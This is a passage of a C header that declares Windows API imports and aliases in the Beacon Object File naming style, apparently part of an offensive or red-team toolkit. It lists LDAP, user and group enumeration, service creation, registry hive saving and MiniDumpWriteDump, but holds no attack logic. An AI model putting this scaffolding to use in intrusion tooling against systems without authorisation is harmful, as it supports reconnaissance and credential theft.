346 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VarFormatDateTime(LPVARIANT pvarIn,int iNamedFormat,ULONG dwFlags,BSTR *pbstrOut); 347 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa); 348 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa); 349 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound); 350 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound); 351 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv); 352 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa); 353 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData); 354 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa); 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | //CERTCLI 364 | /* 365 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumFirstCA(IN LPCWSTR wszScope, IN DWORD dwFlags, OUT LPVOID * phCAInfo); 366 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCA(IN LPVOID hPrevCA, OUT LPVOID * 
phCAInfo); 367 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCA(IN LPVOID hCA); 368 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCAs(IN LPVOID hCAInfo); 369 | DECLSPEC_IMPORT LPCWSTR WINAPI CERTCLI$CAGetDN(IN LPVOID hCAInfo); 370 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAProperty(IN LPVOID hCAInfo, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 371 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCAProperty(IN LPVOID hCAInfo, IN PZPWSTR awszPropertyValue); 372 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAFlags(IN LPVOID hCAInfo, OUT DWORD *pdwFlags); 373 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCACertificate(IN LPVOID hCAInfo, OUT PCCERT_CONTEXT *ppCert); 374 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAExpiration(IN LPVOID hCAInfo, OUT DWORD * pdwExpiration, OUT DWORD * pdwUnits); 375 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCASecurity(IN LPVOID hCAInfo, OUT PSECURITY_DESCRIPTOR * ppSD); 376 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetAccessRights(IN LPVOID hCAInfo, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 377 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypesForCA(IN LPVOID hCAInfo, IN DWORD dwFlags, OUT LPVOID * phCertType); 378 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypes(IN DWORD dwFlags, OUT LPVOID * phCertType); 379 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCertType(IN LPVOID hPrevCertType, OUT LPVOID * phCertType); 380 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCertTypes(IN LPVOID hCertType); 381 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCertType(IN LPVOID hCertType); 382 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeProperty(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 383 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypePropertyEx(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT LPVOID *pPropertyValue); 384 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeProperty(IN LPVOID hCertType, IN PZPWSTR 
awszPropertyValue); 385 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExtensionsEx(IN LPVOID hCertType, IN DWORD dwFlags, IN LPVOID pParam, OUT PCERT_EXTENSIONS * ppCertExtensions); 386 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeExtensions(IN LPVOID hCertType, IN PCERT_EXTENSIONS pCertExtensions); 387 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeFlagsEx(IN LPVOID hCertType, IN DWORD dwOption, OUT DWORD * pdwFlags); 388 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExpiration(IN LPVOID hCertType, OUT OPTIONAL FILETIME * pftExpiration, OUT OPTIONAL FILETIME * pftOverlap); 389 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACertTypeGetSecurity(IN LPVOID hCertType, OUT PSECURITY_DESCRIPTOR * ppSD); 390 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeAccessRights(IN LPVOID hCertType, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 391 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$caTranslateFileTimePeriodToPeriodUnits(IN FILETIME const *pftGMT, IN BOOL Flags, OUT DWORD *pcPeriodUnits, OUT LPVOID*prgPeriodUnits); 392 | */ 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | //dbghelp 405 | DECLSPEC_IMPORT WINBOOL WINAPI DBGHELP$MiniDumpWriteDump(HANDLE hProcess,DWORD ProcessId,HANDLE hFile,MINIDUMP_TYPE DumpType,CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam); 406 | 407 | //WLDAP32 408 | WINLDAPAPI LDAP* LDAPAPI WLDAP32$ldap_init(PSTR, ULONG); 409 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_bind_s(LDAP *ld,const PSTR dn,const PCHAR cred,ULONG method); 410 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_search_s(LDAP *ld,PSTR base,ULONG scope,PSTR filter,PZPSTR attrs,ULONG attrsonly,PLDAPMessage *res); 411 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_entries(LDAP*,LDAPMessage*); 412 | WINLDAPAPI struct berval **LDAPAPI WLDAP32$ldap_get_values_lenA (LDAP *ExternalHandle,LDAPMessage *Message,const PCHAR attr); 413 | 
// WLDAP32 (continued): value release, session options and paged search.
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free_len(struct berval **vals);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_set_optionA(LDAP *ld, int option, const void *invalue);
WINLDAPAPI PLDAPSearch LDAPAPI WLDAP32$ldap_search_init_pageA(
    PLDAP ExternalHandle, const PCHAR DistinguishedName, ULONG ScopeOfSearch,
    const PCHAR SearchFilter, PCHAR AttributeList[], ULONG AttributesOnly,
    PLDAPControlA *ServerControls, PLDAPControlA *ClientControls,
    ULONG PageTimeLimit, ULONG TotalSizeLimit, PLDAPSortKeyA *SortKeys);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_paged_count(
    PLDAP ExternalHandle, PLDAPSearch SearchBlock, ULONG *TotalCount, PLDAPMessage Results);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_next_page_s(
    PLDAP ExternalHandle, PLDAPSearch SearchHandle, struct l_timeval *timeout,
    ULONG PageSize, ULONG *TotalCount, LDAPMessage **Results);

// WLDAP32: walking entries and attributes of a search result.
WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_first_entry(LDAP *ld, LDAPMessage *res);
WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_next_entry(LDAP*, LDAPMessage*);
WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_first_attribute(LDAP *ld, LDAPMessage *entry, BerElement **ptr);
// NOTE(review): winldap.h declares this parameter as PCHAR * (the array that
// ldap_get_values returns); it is declared as PCHAR here -- confirm callers.
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_values(PCHAR);
WINLDAPAPI PCHAR * LDAPAPI WLDAP32$ldap_get_values(LDAP *ld, LDAPMessage *entry, const PSTR attr);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free(PCHAR *);
WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_next_attribute(LDAP *ld, LDAPMessage *entry, BerElement *ptr);
WINLDAPAPI VOID LDAPAPI WLDAP32$ber_free(BerElement *pBerElement, INT fbuf);
WINLDAPAPI VOID LDAPAPI WLDAP32$ldap_memfree(PCHAR);

// WLDAP32: session and message teardown.
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind(LDAP*);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind_s(LDAP*);
WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_msgfree(LDAPMessage*);

// RPCRT4
// The string produced by UuidToStringA is released with RpcStringFreeA.
RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$UuidToStringA(UUID *Uuid, RPC_CSTR *StringUuid);
RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$RpcStringFreeA(RPC_CSTR *String);

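// PSAPI
DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModulesEx(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag);
DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize);

// VERSION
DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeA(LPCSTR lptstrFilename, LPDWORD lpdwHandle);
DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen);



#else

// Alternate branch: every LIBRARY$Function name used by the sources is mapped
// back to the plain function name. The controlling #if is above this excerpt;
// presumably this branch lets the same code build against the regular headers.

// Process-heap helpers. All arguments are parenthesized and intRealloc is
// wrapped as a whole, so the macros expand safely inside larger expressions
// (the unwrapped conditional bound incorrectly next to other operators).
// Caveats for callers:
//  - intRealloc evaluates `ptr` twice; do not pass an expression with side effects.
//  - on failure HeapReAlloc returns NULL and the original block stays allocated,
//    so `p = intRealloc(p, n)` leaks the old block; assign to a temporary first.
//  - HEAP_ZERO_MEMORY zeroes new allocations and only the grown tail of a
//    reallocated block.
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (size))
#define intRealloc(ptr, size) ((ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (ptr), (size)) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (size)))
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (addr))
#define intZeroMemory(addr, size) MSVCRT$memset((addr), 0, (size))

// KERNEL32 (repeated identical definitions of the Heap* aliases were dropped)
#define KERNEL32$VirtualAlloc VirtualAlloc
#define KERNEL32$VirtualFree VirtualFree
#define KERNEL32$LocalAlloc LocalAlloc
#define KERNEL32$LocalFree LocalFree
#define KERNEL32$HeapAlloc HeapAlloc
#define KERNEL32$HeapReAlloc HeapReAlloc
#define KERNEL32$GetProcessHeap GetProcessHeap
#define KERNEL32$HeapFree HeapFree
// NOTE(review): the next two use a mixed-case "Kernel32$" prefix, unlike their
// neighbours; the spelling must match the import declarations, which are above
// this excerpt -- confirm.
#define Kernel32$FormatMessageA FormatMessageA
#define Kernel32$WideCharToMultiByte WideCharToMultiByte
#define KERNEL32$FileTimeToLocalFileTime FileTimeToLocalFileTime
#define KERNEL32$FileTimeToSystemTime FileTimeToSystemTime
#define KERNEL32$GetDateFormatW GetDateFormatW
#define KERNEL32$GetSystemTimeAsFileTime GetSystemTimeAsFileTime
#define KERNEL32$GetLocalTime GetLocalTime
#define KERNEL32$SystemTimeToFileTime SystemTimeToFileTime
#define KERNEL32$SystemTimeToTzSpecificLocalTime SystemTimeToTzSpecificLocalTime
#define KERNEL32$GlobalMemoryStatusEx GlobalMemoryStatusEx
#define KERNEL32$GetDiskFreeSpaceExA GetDiskFreeSpaceExA
#define KERNEL32$GetCurrentProcess GetCurrentProcess
#define KERNEL32$GetCurrentProcessId GetCurrentProcessId
#define KERNEL32$GetLastError GetLastError
#define KERNEL32$CloseHandle CloseHandle
#define KERNEL32$CreateThread CreateThread
#define KERNEL32$GetTickCount GetTickCount
#define KERNEL32$GetTickCount64 GetTickCount64
#define KERNEL32$CreateFiber CreateFiber
#define KERNEL32$ConvertThreadToFiber ConvertThreadToFiber
#define KERNEL32$ConvertFiberToThread ConvertFiberToThread
#define KERNEL32$DeleteFiber DeleteFiber
#define KERNEL32$SwitchToFiber SwitchToFiber
#define KERNEL32$WaitForSingleObject WaitForSingleObject
#define KERNEL32$Sleep Sleep
#define KERNEL32$DeleteFileW DeleteFileW
#define KERNEL32$CreateFileW CreateFileW
#define KERNEL32$GetFileSize GetFileSize
#define KERNEL32$ReadFile ReadFile
#define KERNEL32$OpenProcess OpenProcess
#define KERNEL32$GetComputerNameExW GetComputerNameExW
#define KERNEL32$lstrlenW lstrlenW
#define KERNEL32$lstrcatW lstrcatW
#define KERNEL32$lstrcpynW lstrcpynW
#define KERNEL32$GetFullPathNameW GetFullPathNameW
#define KERNEL32$GetFileAttributesW GetFileAttributesW
#define KERNEL32$GetCurrentDirectoryW GetCurrentDirectoryW
#define KERNEL32$FindFirstFileW FindFirstFileW
#define KERNEL32$FindNextFileW FindNextFileW
#define KERNEL32$FindFirstFileA FindFirstFileA
#define KERNEL32$FindNextFileA FindNextFileA
#define KERNEL32$FindClose FindClose
#define KERNEL32$SetLastError SetLastError
#define KERNEL32$GlobalAlloc GlobalAlloc
#define KERNEL32$GlobalFree GlobalFree
#define KERNEL32$GetEnvironmentStrings GetEnvironmentStrings
#define KERNEL32$FreeEnvironmentStringsA FreeEnvironmentStringsA
#define KERNEL32$ExpandEnvironmentStringsW ExpandEnvironmentStringsW
#define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot
#define KERNEL32$Process32First Process32First
#define KERNEL32$Process32Next Process32Next
#define KERNEL32$Module32First Module32First
#define KERNEL32$Module32Next Module32Next
#define KERNEL32$LoadLibraryA LoadLibraryA
#define KERNEL32$GetProcAddress GetProcAddress
#define KERNEL32$FreeLibrary FreeLibrary
#define KERNEL32$lstrlenA lstrlenA
#define KERNEL32$GetLocaleInfoEx GetLocaleInfoEx
#define KERNEL32$GetSystemDefaultLocaleName GetSystemDefaultLocaleName
#define KERNEL32$LocaleNameToLCID LocaleNameToLCID
#define KERNEL32$GetDateFormatEx GetDateFormatEx

// WTSAPI32
#define WTSAPI32$WTSEnumerateSessionsA WTSEnumerateSessionsA
#define WTSAPI32$WTSQuerySessionInformationA WTSQuerySessionInformationA
#define WTSAPI32$WTSFreeMemory WTSFreeMemory

// IPHLPAPI (the repeated GetAdaptersInfo alias was dropped)
#define IPHLPAPI$GetAdaptersInfo GetAdaptersInfo
#define IPHLPAPI$GetIpForwardTable GetIpForwardTable
#define IPHLPAPI$GetNetworkParams GetNetworkParams
#define IPHLPAPI$GetUdpTable GetUdpTable
#define IPHLPAPI$GetTcpTable GetTcpTable
#define IPHLPAPI$GetIpNetTable GetIpNetTable

// MSVCRT: memory and formatting (memset is defined once; intZeroMemory uses it).
// sprintf does not bound its output; vsnprintf and _snwprintf take a size.
#define MSVCRT$calloc calloc
#define MSVCRT$memcpy memcpy
#define MSVCRT$memcmp memcmp
#define MSVCRT$realloc realloc
#define MSVCRT$free free
#define MSVCRT$memset memset
#define MSVCRT$sprintf sprintf
#define MSVCRT$vsnprintf vsnprintf
#define MSVCRT$_snwprintf _snwprintf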
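// MSVCRT string routines mapped to their plain CRT names. Repeated identical
// definitions (wcsncat, wcsrchr) were dropped.
// strcpy, strcat, sprintf, wcscpy and wcscat do not bound the destination, so
// callers must size buffers themselves; wcscpy_s, wcsncat, strnlen and the
// *_s tokenizers aliased here are the bounded or state-carrying counterparts.
#define MSVCRT$wcscpy_s wcscpy_s
#define MSVCRT$wcslen wcslen
#define MSVCRT$wcstombs wcstombs
#define MSVCRT$sprintf sprintf
#define MSVCRT$wcscmp wcscmp
#define MSVCRT$wcstok wcstok
#define MSVCRT$wcstok_s wcstok_s
#define MSVCRT$wcsstr wcsstr
#define MSVCRT$wcscat wcscat
#define MSVCRT$wcsncat wcsncat
#define MSVCRT$wcscpy wcscpy
#define MSVCRT$_wcsicmp _wcsicmp
#define MSVCRT$wcschr wcschr
#define MSVCRT$wcsrchr wcsrchr
#define MSVCRT$wcstoul wcstoul
#define MSVCRT$strcat strcat
#define MSVCRT$strnlen strnlen
#define MSVCRT$strlen strlen
#define MSVCRT$strcmp strcmp
#define MSVCRT$strncmp strncmp
#define MSVCRT$_stricmp _stricmp
#define MSVCRT$strcpy strcpy
#define MSVCRT$strstr strstr
#define MSVCRT$strchr strchr
#define MSVCRT$strtok strtok
#define MSVCRT$strtok_s strtok_s
#define MSVCRT$strtoul strtoul

// DNSAPI
#define DNSAPI$DnsQuery_A DnsQuery_A
#define DNSAPI$DnsFree DnsFree

// WSOCK32 / WS2_32
#define WSOCK32$inet_addr inet_addr
#define WS2_32$closesocket closesocket
#define WS2_32$connect connect
#define WS2_32$freeaddrinfo freeaddrinfo
#define WS2_32$getaddrinfo getaddrinfo
#define WS2_32$htonl htonl
#define WS2_32$htons htons
#define WS2_32$inet_ntoa inet_ntoa
#define WS2_32$ioctlsocket ioctlsocket
#define WS2_32$select select
#define WS2_32$socket socket
#define WS2_32$__WSAFDIsSet __WSAFDIsSet
#define WS2_32$WSAGetLastError WSAGetLastError

// NETAPI32 (the repeated NetApiBufferFree alias was dropped)
#define NETAPI32$DsGetDcNameA DsGetDcNameA
#define NETAPI32$NetUserGetInfo NetUserGetInfo
#define NETAPI32$NetUserModalsGet NetUserModalsGet
#define NETAPI32$NetServerEnum NetServerEnum
#define NETAPI32$NetUserGetGroups NetUserGetGroups
#define NETAPI32$NetUserGetLocalGroups NetUserGetLocalGroups
#define NETAPI32$NetApiBufferFree NetApiBufferFree
#define NETAPI32$NetGetAnyDCName NetGetAnyDCName
#define NETAPI32$NetUserEnum NetUserEnum
#define NETAPI32$NetGroupGetUsers NetGroupGetUsers
#define NETAPI32$NetQueryDisplayInformation NetQueryDisplayInformation
#define NETAPI32$NetLocalGroupEnum NetLocalGroupEnum
#define NETAPI32$NetLocalGroupGetMembers NetLocalGroupGetMembers
#define NETAPI32$NetUserSetInfo NetUserSetInfo
#define NETAPI32$NetShareEnum NetShareEnum
#define NETAPI32$NetWkstaUserEnum NetWkstaUserEnum
#define NETAPI32$NetWkstaGetInfo NetWkstaGetInfo
#define NETAPI32$NetStatisticsGet NetStatisticsGet
#define NETAPI32$NetSessionEnum NetSessionEnum

// MPR
#define MPR$WNetOpenEnumW WNetOpenEnumW
#define MPR$WNetEnumResourceW WNetEnumResourceW
#define MPR$WNetCloseEnum WNetCloseEnum
#define MPR$WNetGetNetworkInformationW WNetGetNetworkInformationW
#define MPR$WNetGetConnectionW WNetGetConnectionW
#define MPR$WNetGetResourceInformationW WNetGetResourceInformationW
#define MPR$WNetGetUserW WNetGetUserW
#define MPR$WNetAddConnection2W WNetAddConnection2W
#define MPR$WNetCancelConnection2W WNetCancelConnection2W

// USER32 (the repeated GetWindowTextA / GetClassNameA aliases were dropped)
#define USER32$EnumDesktopWindows EnumDesktopWindows
#define USER32$IsWindowVisible IsWindowVisible
#define USER32$GetWindowTextA GetWindowTextA
#define USER32$GetClassNameA GetClassNameA
#define USER32$CharPrevW CharPrevW
#define USER32$FindWindowExA FindWindowExA
#define USER32$SendMessageA SendMessageA
#define USER32$EnumChildWindows EnumChildWindows

// SECUR32 / SHLWAPI
#define SECUR32$GetUserNameExA GetUserNameExA
#define SHLWAPI$StrStrIA StrStrIA
#define SHLWAPI$SHFormatDateTimeA SHFormatDateTimeA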
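// ADVAPI32: token, SID, service-control, registry and security-descriptor
// aliases. Repeated identical definitions (OpenProcessToken,
// GetTokenInformation, LookupAccountSidW, RegQueryInfoKeyA) were dropped;
// each alias is now defined once.
#define ADVAPI32$OpenProcessToken OpenProcessToken
#define ADVAPI32$GetTokenInformation GetTokenInformation
#define ADVAPI32$ConvertSidToStringSidA ConvertSidToStringSidA
#define ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW ConvertStringSecurityDescriptorToSecurityDescriptorW
#define ADVAPI32$LookupAccountSidA LookupAccountSidA
#define ADVAPI32$LookupAccountSidW LookupAccountSidW
#define ADVAPI32$LookupPrivilegeNameA LookupPrivilegeNameA
#define ADVAPI32$LookupPrivilegeDisplayNameA LookupPrivilegeDisplayNameA
#define ADVAPI32$OpenSCManagerA OpenSCManagerA
#define ADVAPI32$OpenServiceA OpenServiceA
#define ADVAPI32$QueryServiceStatus QueryServiceStatus
#define ADVAPI32$QueryServiceConfigA QueryServiceConfigA
#define ADVAPI32$CloseServiceHandle CloseServiceHandle
#define ADVAPI32$EnumServicesStatusExA EnumServicesStatusExA
#define ADVAPI32$QueryServiceStatusEx QueryServiceStatusEx
#define ADVAPI32$QueryServiceConfig2A QueryServiceConfig2A
#define ADVAPI32$ChangeServiceConfig2A ChangeServiceConfig2A
#define ADVAPI32$ChangeServiceConfigA ChangeServiceConfigA
#define ADVAPI32$CreateServiceA CreateServiceA
#define ADVAPI32$DeleteService DeleteService
#define ADVAPI32$RegOpenKeyExW RegOpenKeyExW
#define ADVAPI32$EnumServicesStatusExW EnumServicesStatusExW
#define ADVAPI32$RegCreateKeyA RegCreateKeyA
#define ADVAPI32$RegSetValueExA RegSetValueExA
#define ADVAPI32$RegOpenKeyExA RegOpenKeyExA
#define ADVAPI32$RegConnectRegistryA RegConnectRegistryA
#define ADVAPI32$RegCloseKey RegCloseKey
#define ADVAPI32$RegOpenKeyA RegOpenKeyA
#define ADVAPI32$RegCreateKeyExA RegCreateKeyExA
#define ADVAPI32$RegDeleteKeyExA RegDeleteKeyExA
#define ADVAPI32$RegDeleteKeyValueA RegDeleteKeyValueA
#define ADVAPI32$RegQueryValueExA RegQueryValueExA
#define ADVAPI32$RegQueryInfoKeyA RegQueryInfoKeyA
#define ADVAPI32$RegEnumValueA RegEnumValueA
#define ADVAPI32$RegEnumKeyExA RegEnumKeyExA
#define ADVAPI32$RegDeleteValueA RegDeleteValueA
#define ADVAPI32$RegQueryValueExW RegQueryValueExW
#define ADVAPI32$RegSaveKeyExA RegSaveKeyExA
#define ADVAPI32$GetFileSecurityW GetFileSecurityW
#define ADVAPI32$GetSecurityDescriptorOwner GetSecurityDescriptorOwner
#define ADVAPI32$GetSecurityDescriptorDacl GetSecurityDescriptorDacl
#define ADVAPI32$GetAclInformation GetAclInformation
#define ADVAPI32$GetAce GetAce
#define ADVAPI32$ConvertSidToStringSidW ConvertSidToStringSidW
#define ADVAPI32$MapGenericMask MapGenericMask
#define ADVAPI32$InitializeSecurityDescriptor InitializeSecurityDescriptor
#define ADVAPI32$SetSecurityDescriptorDacl SetSecurityDescriptorDacl
#define ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW ConvertSecurityDescriptorToStringSecurityDescriptorW
#define ADVAPI32$StartServiceA StartServiceA
#define ADVAPI32$ControlService ControlService
#define ADVAPI32$EnumDependentServicesA EnumDependentServicesA

// NTDLL
#define NTDLL$NtCreateFile NtCreateFile
#define NTDLL$NtClose NtClose

// IMAGEHLP / CRYPT32: embedded-certificate and signature inspection
#define IMAGEHLP$ImageEnumerateCertificates ImageEnumerateCertificates
#define IMAGEHLP$ImageGetCertificateHeader ImageGetCertificateHeader
#define IMAGEHLP$ImageGetCertificateData ImageGetCertificateData
#define CRYPT32$CryptVerifyMessageSignature CryptVerifyMessageSignature
#define CRYPT32$CertGetNameStringW CertGetNameStringW
#define CRYPT32$CertGetCertificateContextProperty CertGetCertificateContextProperty
#define CRYPT32$CertCreateCertificateContext CertCreateCertificateContext
#define CRYPT32$CertFreeCertificateContext CertFreeCertificateContext
#define CRYPT32$CertGetCertificateChain CertGetCertificateChain
#define CRYPT32$CertFreeCertificateChain CertFreeCertificateChain
#define CRYPT32$CryptFindOIDInfo CryptFindOIDInfo

// WS2_32 / DNSAPI
#define WS2_32$InetNtopW InetNtopW
#define WS2_32$inet_pton inet_pton
#define DNSAPI$DnsFree DnsFree
#define DNSAPI$DnsGetCacheDataTable DnsGetCacheDataTable

// OLE32: COM initialisation, activation and task-memory helpers
#define OLE32$CoInitializeEx CoInitializeEx
#define OLE32$CoUninitialize CoUninitialize
#define OLE32$CoInitializeSecurity CoInitializeSecurity
#define OLE32$CoCreateInstance CoCreateInstance
#define OLE32$CLSIDFromString CLSIDFromString
#define OLE32$IIDFromString IIDFromString
#define OLE32$StringFromGUID2 StringFromGUID2
#define OLE32$CoSetProxyBlanket CoSetProxyBlanket
#define OLE32$CoTaskMemAlloc CoTaskMemAlloc
#define OLE32$CoTaskMemFree CoTaskMemFree

// OLEAUT32: BSTR, VARIANT and SAFEARRAY helpers
#define OLEAUT32$SysAllocString SysAllocString
#define OLEAUT32$SysReAllocString SysReAllocString
#define OLEAUT32$SysFreeString SysFreeString
#define OLEAUT32$SysStringLen SysStringLen
#define OLEAUT32$VariantInit VariantInit
#define OLEAUT32$VariantClear VariantClear
#define OLEAUT32$SysAddRefString SysAddRefString
#define OLEAUT32$VariantChangeType VariantChangeType
#define OLEAUT32$VarFormatDateTime VarFormatDateTime
#define OLEAUT32$SafeArrayDestroy SafeArrayDestroy
#define OLEAUT32$SafeArrayLock SafeArrayLock
#define OLEAUT32$SafeArrayGetLBound SafeArrayGetLBound
#define OLEAUT32$SafeArrayGetUBound SafeArrayGetUBound
#define OLEAUT32$SafeArrayGetElement SafeArrayGetElement
#define OLEAUT32$SafeArrayGetElemsize SafeArrayGetElemsize
#define OLEAUT32$SafeArrayAccessData SafeArrayAccessData
#define OLEAUT32$SafeArrayUnaccessData SafeArrayUnaccessData


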
// CERTCLI aliases are disabled, matching the commented-out CERTCLI import
// declarations earlier in this header.
/*
#define CERTCLI$CAEnumFirstCA CAEnumFirstCA
#define CERTCLI$CAEnumNextCA CAEnumNextCA
#define CERTCLI$CACloseCA CACloseCA
#define CERTCLI$CACountCAs CACountCAs
#define CERTCLI$CAGetDN CAGetDN
#define CERTCLI$CAGetCAProperty CAGetCAProperty
#define CERTCLI$CAFreeCAProperty CAFreeCAProperty
#define CERTCLI$CAGetCAFlags CAGetCAFlags
#define CERTCLI$CAGetCACertificate CAGetCACertificate
#define CERTCLI$CAGetCAExpiration CAGetCAExpiration
#define CERTCLI$CAGetCASecurity CAGetCASecurity
#define CERTCLI$CAGetAccessRights CAGetAccessRights
#define CERTCLI$CAEnumCertTypesForCA CAEnumCertTypesForCA
#define CERTCLI$CAEnumCertTypes CAEnumCertTypes
#define CERTCLI$CAEnumNextCertType CAEnumNextCertType
#define CERTCLI$CACountCertTypes CACountCertTypes
#define CERTCLI$CACloseCertType CACloseCertType
#define CERTCLI$CAGetCertTypeProperty CAGetCertTypeProperty
#define CERTCLI$CAGetCertTypePropertyEx CAGetCertTypePropertyEx
#define CERTCLI$CAFreeCertTypeProperty CAFreeCertTypeProperty
#define CERTCLI$CAGetCertTypeExtensionsEx CAGetCertTypeExtensionsEx
#define CERTCLI$CAFreeCertTypeExtensions CAFreeCertTypeExtensions
#define CERTCLI$CAGetCertTypeFlagsEx CAGetCertTypeFlagsEx
#define CERTCLI$CAGetCertTypeExpiration CAGetCertTypeExpiration
#define CERTCLI$CACertTypeGetSecurity CACertTypeGetSecurity
#define CERTCLI$CAGetCertTypeAccessRights CAGetCertTypeAccessRights
#define CERTCLI$caTranslateFileTimePeriodToPeriodUnits caTranslateFileTimePeriodToPeriodUnits
*/

// DBGHELP
#define DBGHELP$MiniDumpWriteDump       MiniDumpWriteDump

// WLDAP32
#define WLDAP32$ldap_init               ldap_init
#define WLDAP32$ldap_bind_s             ldap_bind_s
#define WLDAP32$ldap_search_s           ldap_search_s
#define WLDAP32$ldap_count_entries      ldap_count_entries
#define WLDAP32$ldap_get_values_lenA    ldap_get_values_lenA
#define WLDAP32$ldap_value_free_len     ldap_value_free_len
#define WLDAP32$ldap_set_optionA        ldap_set_optionA
#define WLDAP32$ldap_search_init_pageA  ldap_search_init_pageA
#define WLDAP32$ldap_get_paged_count    ldap_get_paged_count
#define WLDAP32$ldap_get_next_page_s    ldap_get_next_page_s
#define WLDAP32$ldap_first_entry        ldap_first_entry
#define WLDAP32$ldap_next_entry         ldap_next_entry
#define WLDAP32$ldap_first_attribute    ldap_first_attribute
#define WLDAP32$ldap_count_values       ldap_count_values
#define WLDAP32$ldap_get_values         ldap_get_values
#define WLDAP32$ldap_value_free         ldap_value_free
#define WLDAP32$ldap_next_attribute     ldap_next_attribute
#define WLDAP32$ber_free                ber_free
